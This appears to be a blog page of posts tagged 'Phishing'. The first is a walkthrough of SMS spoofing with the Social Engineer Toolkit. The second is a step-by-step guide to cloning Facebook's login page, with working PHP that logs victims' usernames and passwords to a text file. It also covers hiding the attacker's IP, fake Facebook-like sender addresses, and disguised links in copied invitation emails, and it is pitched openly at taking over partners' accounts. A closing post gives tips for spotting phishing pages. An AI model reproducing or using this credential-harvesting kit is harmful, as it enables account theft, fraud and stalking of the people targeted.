Featured post

Free Online Money Earning, no investment required

If you are trying to earn money online & need only small extra income less than $200 (Rs.12,000) then PTC sites are the best way to st...

Showing posts with label Phishing. Show all posts
Showing posts with label Phishing. Show all posts

SET SMS Spoofing Attack Vector | Backtrack 5 | Tutorial


Mobile communication is now everywhere, mobile hacking is seems to be difficult and a normal user, student and ethical hacker usually don't go towards the mobile hacking field. Mobile hacking is so general word and it contains hacking attack from physical layer to application layer of OSI model. Spoofing attack is not a new attack and you must have heard about IP spoofing, DNS spoofing and SMS spoofing. 

In spoofing attack an attacker make himself a source or desire address. 

What Is SMS Spoofing?

Short message service (SMS) is now available on mobile phones, I, You and everyone using SMS for the communication. SMS spoofing means to set who the message appears to come from by replacing the originating mobile number (Sender ID) with alphanumeric text/ another number. (Wikipedia).
I will discuss most of the theorical aspect here like how to perform SMS spoofing? How SMS spoofing work? And so many question.

SMS Spoofing Tutorial


Social engineering toolkit contain a SMS spoofing attack vector that can used to perform SMS spoofing. Requirement for tutorial:
  • Operating system (Backtrack 5 for this tutorial)
  • SET (Social engineering toolkit)
So I will use backtrack 5 to perform SMS spoofing however you can use Ubuntu, Gnacktrack, Backbox and other Linux or other OS.
  • On the SET menu select number 7 that is SMS spoofing attack vector.
  • On the second step “1. Perform a SMS Spoofing Attack”
  • On the third choose what you want to do a Mass SMS spoofing or a single in this case I select 1.
  • On the fourth you need to enter the number of the receiver, make sure to enter with country code.
  • On the next step 1. Pre-Defined Template
  • On this step you need to choose the templates (choose what you want)
  • If you have a android emulator that wonderful but you can use some paid services. So its up to you select and than send your message.

HACK FACEBOOK ACCOUNT

Hi folks...
In these days facebook become the number 1 social networking site, Everyone who are using facebook accounts want to hack the facebook account of others. Most of the peoples want to control over their girlfriend facebook accounts. Is't it..? A lot of people contact me about suspecting their boyfriend/girlfriend of cheating, they give me their id's and want to know their passwords. So let me start...


Phishing WebPage:
Phishing is a way to acquire information such as usernames, passwords and credit card details of a user. Creating webpage which look like any site is described as Phishing.  By creating Phishing WebPage, you can make users to believe that it is original website and enter their id and password.


Step 1:
Go to Facebook.com
Right click on the white space of the front page.  Select "View Page source".
Copy the code to Notepad.

Step2:
Now find (Press ctrl +f)  for "action="  in that code.
You fill find the code like this:


You have to change it to 'action="gain.php" '. after you have done that, you should change the method (small circle on the picture) to "get" instead of "post", otherwise it will not work. Save the document as index.html


Step 3:
Now we need to create the "next.php" to store the password.  so open the notepad and type the following code:


<php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("show.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>



save this file as "gain.php"

Step 4:
open the notepad and just save the file as "show.txt" without any contents.

Now upload these 3 files(namely index.html,gain.php,show.txt) on any Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.


Step 5:
 create an mail account with facebook keyword like :FACEBOOK@hotmail.com,Facebook@noreply.com,facebook_welcome@hotmail.com,facebook_friends@gmail.com

Step 6 :

Copy the original Facebook friendship invitation and paste in your mail.
remove the hyperlink from this  http:/www.facebook.com/n/?reqs.php
 Mark it and push the Add hyperlink button
*Updated*  
everyone asking doubts about this 6th step.   You may get Facebook friendship invitation from Facebook when someone "add as a friend", right? Just copy that mail and paste in compose mail.  In that content , you can find this link http:/www.facebook.com/n/?reqs.php .  Just change the delete the link and create link with same text but link to your site.  






Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. 


Note:
For user to believe change Your phishing web page url with any of free short url sites. 

Like : co.nr, co.cc etc..
This will make users to believe that it is correct url.

HOW TO IDENTIFY A PHISHING PAGE ?


In these days phishing is the easiest way to hack any account and we get lots of phishing pages everyday, so how to find that our page is a phishing page or not. So today i am going to show you how to identify fake login pages. These phishing attacks are very simple to avoid. When you are asked to put your confidential data in any website or login pages, first check the URL. If the URL is different from your original URL, then it is a fake page. say.. we have gmail, in this case the URL should be "mail.google.com" or "gmail.com" like this. Anything else is fake. I just wrote this post because lots of people sending me message that they want to know how to identify a phishing page, so folks here is the answer.
We can also identify fake login pages by observing the source code of the page.
In the case of gmail fake login page, do the following steps.
1) right click on the page


2) click on "view page source"
3) Now the source code of the page will be opened.




4) Now search for the word "action"
   This can be done by pressing "ctrl+f". It opens a search box. Now enter the word "action" into the box and press enter.
   If You see "something.php" next to the word "action" then it is a fake page. otherwise it will be original a one.


Some more that you have to know also.

Tip 1 It is important that you learn to recognize all types of phishing emails. You should make yourself aware that if you receive a message which needs you to take immediate action with regard to any of your personal accounts then avoid it like the plague. Most phishing emails will be addressed to either “Dear Valued Customer” or “Dear Sir/Madam”, while any legitimate emails from your bank or credit card company will be addressed to you by name. It is important to know that the phisher who has sent the email in the first place is after your personal information in order to use it for fraudulent purposes.
Tip 2 Never ever send any kind of sensitive personal information using an email. Emails are not the most secure form of communication available for people to use on the Internet. Certainly many scammers are quite capable of producing an email that looks legitimate and so will be easily able to forge such a document and then gain your information in this way.
Tip 3 If you do have to transmit any personal information over the Internet then ensure that the site you are providing it to is completely secure. The best way for a person to identify if a site is secure or not is by looking at the site address. All sites which are considered to be secure should start with “https://” and not “http://”. Also if you look in the browser status bar you will see the lock icon being displayed.
Tip 4 If you ever receive an email from someone you do not know and it contains a link within it then do not click on it. Rather what you should be doing is opening up an new browser page and then typing in the address which you know to be the authentic one. Or else you could call the person or company directly if you have had dealings with them and have spoken with them by telephone before.
If you have Any Queries Ask me in form Of Comments and don't forget to share and join this blog and like us on Facebook......
Androite XDA. Powered by Blogger.